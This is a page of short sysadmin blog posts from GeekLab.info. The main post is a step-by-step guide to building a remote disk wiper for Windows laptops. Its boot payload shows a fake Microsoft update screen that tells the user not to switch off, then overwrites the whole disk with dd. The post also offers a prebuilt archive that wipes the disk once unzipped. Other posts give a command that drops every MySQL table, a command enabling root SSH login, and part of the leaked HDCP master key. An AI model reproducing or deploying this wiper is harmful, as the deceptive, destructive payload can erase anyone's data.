Drop all mysql tables

To drop all mysql tables from the command line, use the following command:

mysqldump -u [username] -p [password] --add-drop-table --no-data [databasename] | grep ^DROP | mysql -u [username] -p [password] [databasename]

© GeekLabInfo Drop all mysql tables is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

Remote wipe for Windows clients

I've recently had this situation where an employee was fired, and then refused to return 'his' laptop to the company. I cannot break into his home to return the hardware. But at least, I can make sure the software volume licences are really removed from the hardware. I did this with my own, self-built remote wipe function.

How to do a remote wipe of a Windows client that you own? WARNING: DO NOT use this method on other people's computers! Don't ever do vandalism, just use this to protect your data from thieves.

Prebuilt software

Below is a manual on creating software to wipe a system. You may also download my prebuilt software. Unzipping this in the c:\ of your computer will wipe the harddisk.

Social solution for technical limitations

The bootsector of a harddrive is overwritten in a jiffy. But this can easily be restored with special tools. If you overwrite the whole harddisk, the data cannot be restored. But overwriting takes a lot of time.
If you're telling the thief "hey, i'm now overwriting the harddisk", he'll probably switch it off. So we need to scare the thief into not turning of the computer. I did this by printing a text "microsoft update being installed" and saying that the user should absolutely not switch off the computer.

Requirements

To build the software for a remote wipe, you need:

  • Administrator access to the stolen laptop
  • A virtual machine (like VMWare) to test it. An identical laptop would even be better, 'cause it has the exact same drivers.

Step 1. Build grub bootloader

You can build your own bootloader or use my grldr. Compiling on my x86_64 didn't work, use a 32 bit system (or fix the libs yourself)!

mkdir /tmp/bootloader
cd /tmp/bootloader
wget http://download.gna.org/grub4dos/grub4dos-0.4.4-src.zip
unzip grub4dos-0.4.4-src.zip
cd grub4dos-0.4.4
chmod +x configure build
vim stage2/boot.c
//edit line 298 and 960 and to scare the laptop thief into not switching off the computer.
make

In grub4dos-temp/grub4dos-0.4.4/ you'll find a file grldr. This is the grub bootloader. Copy it to the c:\ of the computer you want to wipe.

Step 2. Get yourself a linux kernel

I simply used the running CentOS kernel of my development machine, named /boot/vmlinuz-2.6.18-194.26.1.el5. I renamed this file to bzImage and copied it to the c:\ of the "victim".

Step 3. Make a initrd

With a regular Linux installation, all files are placed on a Linux (ext2, ext3, ext4, xfs or btrfs) partition. Unfortunately, we don't have such a partition. Thats why we put all tools in a initrd (initial ramdisk). We may need SATA drivers, so as a base we use the initrd associated with the kernel we use, which is /boot/initrd-2.6.18-194.26.1.el5.img

mkdir /tmp/initrd
cd /tmp/initrd
cat /boot/initrd-2.6.18-194.26.1.el5.img | gzip -d | cpio -id
cd bin
#Download a statically linked "dd" executable. (Or build it yourself)
wget https://www.geeklab.info/wp-content/uploads/2010/12/dd.zip
unzip dd.zip && rm dd.zip
cd ..

Now edit the file "init" to load all required drivers, make /dev nodes and finally wipe the system. My init file contains:

#!/bin/nash
echo
echo
# here I have 40 more echo's, like a "tput clear" without having the tput command
echo
echo
echo "Microsoft(TM) Windows(TM) is applying updates."
echo
echo
echo "Running pre-update checks:"
echo "- Windows kernel: OK"
echo "- Drivers: OK"
sleep 1
echo "- Diskspace: OK"
echo "- Disk fragmentation: Defragmentation required to continue"
sleep 1
echo " Defragmenting harddisk. This may take a while. Please wait..."
echo " WARNING: Do not turn off your computer to prevent damage"
echo ""
mount -t proc /proc /proc
mount -t sysfs /sys /sys
mount -o mode=0755 -t tmpfs /dev /dev
mkdir /dev/pts
mount -t devpts -o gid=5,mode=620 /dev/pts /dev/pts
mkdir /dev/shm
mkdir /dev/mapper
mknod /dev/null c 1 3
mknod /dev/zero c 1 5
mknod /dev/urandom c 1 9
mknod /dev/systty c 4 0
mknod /dev/tty c 5 0
mknod /dev/console c 5 1
mknod /dev/ptmx c 5 2
mknod /dev/rtc c 10 135
mknod /dev/tty0 c 4 0
mknod /dev/tty1 c 4 1
hotplug
mkblkdevs
insmod /lib/scsi_mod.ko
insmod /lib/libata.ko
#insmod /lib/sata_via.ko #or other drivers
mkblkdevs
dd if=/dev/zero of=/dev/?da #either sda or hda

Warning: You may need drivers to access the harddisk, for instance ahci.ko. Check the "victims" chipset and load the correct drivers.
Finally, merge the files to 1 initrd file: find ./ | cpio -H newc -o | gzip > /tmp/initrd.gz and copy it to c:\ of the "victim".

Step 4: menu.lst

Create a file named menu.lst and place it in c:\

default 0
timeout 0
title Installing update
kernel (hd0,0)/bzImage quiet
initrd (hd0,0)/initrd.gz

Step 5: boot.ini

The hidden system file c:\boot.ini contains information for the ntldr bootloader windows uses. Remove the system and hidden attributes. Then edit boot.ini to contain the following information:

[boot loader]
timeout=0
default=c:\grldr
[operating systems]
c:\grldr="MSWIN Updater service"

Step 6: Check

The c:\ of the "victim" now contains:
c:\grldr
c:\menu.lst
c:\bzImage
c:\initrd.gz
c:\boot.ini
Check that all files exist.

Step 7: Reboot

With psshutdown (part of microsoft's pstools) reboot the "victim": psshutdown \\computer -r -t 0. Don't wait for the "victim" to reboot his computer, he may not reboot it but suspend instead.

© GeekLabInfo Remote wipe for Windows clients is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 4.50 out of 5)
Loading...

Enabling root SSH login on an ESX host

Starting with ESX 3.0, the ESX Server by default no longer allows root login over ssh. How to 'fix' this?

Warning: ssh root access isn't disabled (just :P ) to annoy to. It's to protect you. Before enabling ssh root access, make sure nobody you don't trust can connect to the ssh server.

  • Login on the console of the esx host
  • Press alt+f1 to get a login screen
  • Login as root
  • Type: sed -i "s/PermitRootLogin.*/PermitRootLogin yes/g" /etc/ssh/sshd_config
  • Type: service sshd restart
  • Logout and get yourself a cup of coffee.
© GeekLabInfo Enabling root SSH login on an ESX host is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

Blocking .wwf attachments

Some idiotic german 'invented' a way to 'save trees'. By converting your attachments to .wwf format - a special .pdf format that blocks printing. While this may be a great feature to block printing of contracts etcetera if you're running a malicious company, most people simply don't want this.

So the big question is: How do I block .wwf files?

Postfix

In /etc/postfix/main.cf uncomment or add the following line
header_checks = pcre:/etc/postfix/header_checks

Then edit /etc/postfix/header_checks and add the following line:
/Content-Disposition: .*\.wwf"/ REJECT Please don't send .wwf files.

Exchange

Attachment blocking in exchange is usually performed by a virusscanner/spamfilter. You could use for example Trend Micro or GFI to block .wwf files.

Sendmail

Depending on your setup, you could use amavisd-new, mailscanner or procmail to block out .wwf files.

qmail

To block attachments with qmail, you'll need Simscan. Simscan is a simple program that enables the qmail smtpd service to reject viruses, spam, and block attachments during the SMTP conversation so the processing load on the email system is kept to a minimum. The project is open source and uses other open source components. Small, very efficient and written in C.

© GeekLabInfo Blocking .wwf attachments is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

HDCP is dead

And you know why? Because this is the master key:


HDCP MASTER KEY (MIRROR THIS TEXT!)

This is a forty times forty element matrix of fifty-six bit hexadecimal numbers.

To generate a source key, take a forty-bit number that (in binary) consists of twenty ones and twenty zeroes; this is the source KSV.  Add together those twenty rows of the matrix that correspond to the ones in the KSV (with the lowest bit in the KSV corresponding to the first row), taking all elements modulo two to the power of fifty-six; this is the source private key.

To generate a sink key, do the same, but with the transposed matrix.
    
    6692d179032205 b4116a96425a7f ecc2ef51af1740 959d3b6d07bce4 fa9f2af29814d9

    82592e77a204a8 146a6970e3c4a1 f43a81dc36eff7 568b44f60c79f5 bb606d7fe87dd6

    1b91b9b73c68f9 f31c6aeef81de6 9a9cc14469a037 a480bc978970a6 997f729d0a1a39
<p><a class="more-link" href="https://www.geeklab.info/2010/09/hdcp-is-dead/">Continue Reading&hellip;</a></p>

© GeekLabInfo HDCP is dead is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

Google Talk on Fedora 13

Since a few days, Google has this great feature that allows you to dial land lines from your gmail account. Unfortunately, they are only shipping a Linux client for Debian/Ubuntu. I'm using a custom repository with a lot of custom-build RPMs, and I really don't feel like switching away from RedHat-style for servers and clients.

How to use the .deb file on Fedora?

  • First, go to gmail and click on the "call" icon in the left sidebar
  • Download the .deb file offered. I use x86_64, so I get the file google-talkplugin_current_amd64.deb
  • Start a shell
  • mv [filename] /tmp
  • mkdir /tmp/googletalk
  • cd /tmp/googletalk
  • now, extract the file: ar vx ../google-talkplugin_current_amd64.deb
  • you get 3 files, control.tar.gz data.tar.gz and debian-binary
  • extract data.tar.gz: tar zxvf data.tar.gz
  • I don't want the google crontab, which of course is debian-based, so I only copy relevant files: cp -R opt usr /

Now, on a Debian based system, we would be ready. But on Fedora, some lib versions are incorrent. Link to the correct files:

  • cd /lib
  • ln -s libssl.so.1.0.0a libssl.so.0.9.8
  • ln -s libcrypto.so.1.0.0a libcrypto.so.0.9.8

Restart Firefox. Now you're done.

© GeekLabInfo Google Talk on Fedora 13 is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...